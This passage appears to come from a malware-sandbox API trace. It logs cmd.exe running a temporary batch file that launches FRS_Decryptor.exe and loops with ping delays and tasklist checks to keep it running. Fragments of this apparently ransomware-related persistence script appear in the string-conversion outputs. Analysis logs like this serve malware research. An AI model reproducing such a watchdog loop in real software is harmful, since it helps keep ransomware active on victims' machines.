lpDistanceToMoveHigh=0x0) returned 0x9ad [0128.073] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0128.073] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.073] GetFileType (hFile=0x2e8) returned 0x1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0128.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0128.073] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0128.073] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.073] GetFileType (hFile=0x2e8) returned 0x1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0128.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0128.073] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0128.073] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.073] GetFileType (hFile=0x2e8) returned 0x1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0128.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0128.073] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0128.073] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0128.074] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.074] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0128.074] _get_osfhandle (_FileHandle=0) returned 0x24 [0128.074] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0128.074] SetConsoleInputExeNameW () returned 0x1 [0128.074] GetConsoleOutputCP () returned 0x1b5 [0128.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0128.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.075] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0128.075] _open_osfhandle (_OSFileHandle=0x2e8, _Flags=8) returned 3 [0128.075] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.075] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0128.075] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0128.075] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0128.075] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0128.075] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0128.075] GetFileType (hFile=0x2e8) returned 0x1 [0128.075] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.075] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0128.075] _tell (_FileHandle=3) returned 2512 [0128.075] _close (_FileHandle=3) returned 0 [0128.075] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0128.075] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0128.075] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0128.076] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0128.076] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0128.076] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0128.076] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0128.076] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0128.076] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0128.076] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0128.076] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0128.076] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0128.076] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0128.076] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0128.076] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0128.076] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0128.076] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0128.076] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0128.076] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0128.076] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0128.076] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0128.076] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0128.076] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0128.076] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0128.076] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0128.076] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0128.076] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0128.076] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0128.076] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0128.076] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0128.076] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0128.076] _wcsicmp (_String1="ping", _String2="START") returned -3 [0128.076] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0128.076] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0128.076] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0128.076] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0128.076] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0128.076] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0128.076] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0128.076] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0128.076] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0128.076] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0128.076] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0128.076] SetErrorMode (uMode=0x0) returned 0x0 [0128.076] SetErrorMode (uMode=0x1) returned 0x0 [0128.076] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0128.076] SetErrorMode (uMode=0x0) returned 0x1 [0128.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.076] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.076] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.077] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0128.077] GetLastError () returned 0x2 [0128.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0128.077] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0128.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0128.077] GetLastError () returned 0x2 [0128.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ab0 [0128.077] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0128.077] GetFileType (hFile=0x28) returned 0x2 [0128.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0128.077] _dup (_FileHandle=1) returned 3 [0128.077] _close (_FileHandle=1) returned 0 [0128.077] _wcsicmp (_String1="nul", _String2="con") returned 11 [0128.077] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0128.077] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0128.077] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0128.078] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0128.078] SetErrorMode (uMode=0x0) returned 0x0 [0128.078] SetErrorMode (uMode=0x1) returned 0x0 [0128.078] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0128.078] SetErrorMode (uMode=0x0) returned 0x1 [0128.078] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.078] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.078] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.078] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0128.078] GetLastError () returned 0x2 [0128.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0128.078] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0128.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0128.078] GetLastError () returned 0x2 [0128.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0128.079] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0128.079] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0128.079] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0128.079] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0128.079] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.079] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.080] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.080] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.080] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.080] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.080] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.080] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.080] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0128.080] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x2b8, dwProcessId=0x9c0, dwThreadId=0x2fc)) returned 1 [0128.082] CloseHandle (hObject=0x2b8) returned 1 [0128.082] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.082] GetEnvironmentStringsW () returned 0xd7e510* [0128.082] FreeEnvironmentStringsA (penv="=") returned 1 [0128.082] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0130.159] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0130.159] CloseHandle (hObject=0x2b0) returned 1 [0130.159] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0130.160] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0130.160] GetEnvironmentStringsW () returned 0xd30508* [0130.160] FreeEnvironmentStringsA (penv="=") returned 1 [0130.160] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.160] GetEnvironmentStringsW () returned 0xd7e510* [0130.160] FreeEnvironmentStringsA (penv="=") returned 1 [0130.160] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0130.160] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0130.160] _close (_FileHandle=3) returned 0 [0130.160] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.160] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0130.160] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.160] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0130.160] _get_osfhandle (_FileHandle=0) returned 0x24 [0130.160] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0130.161] SetConsoleInputExeNameW () returned 0x1 [0130.161] GetConsoleOutputCP () returned 0x1b5 [0130.161] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0130.161] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.161] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0130.161] _open_osfhandle (_OSFileHandle=0x2e8, _Flags=8) returned 3 [0130.161] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0130.161] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0130.161] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0130.161] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0130.161] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0130.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0130.161] GetFileType (hFile=0x2e8) returned 0x1 [0130.161] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0130.161] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0130.161] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0130.161] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0130.162] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0130.162] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0130.162] GetFileType (hFile=0x2e8) returned 0x1 [0130.162] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0130.162] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0130.162] _tell (_FileHandle=3) returned 2627 [0130.162] _close (_FileHandle=3) returned 0 [0130.162] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0130.162] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0130.162] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0130.162] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0130.162] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0130.166] feof (_File=0x76ea4c68) returned 0 [0130.166] ferror (_File=0x76ea4c68) returned 0 [0130.166] fgets (in: _Buf=0xd81f70, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0130.632] feof (_File=0x76ea4c68) returned 0 [0130.632] ferror (_File=0x76ea4c68) returned 0 [0130.632] fgets (in: _Buf=0xd865c6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0130.669] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0130.670] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43886, 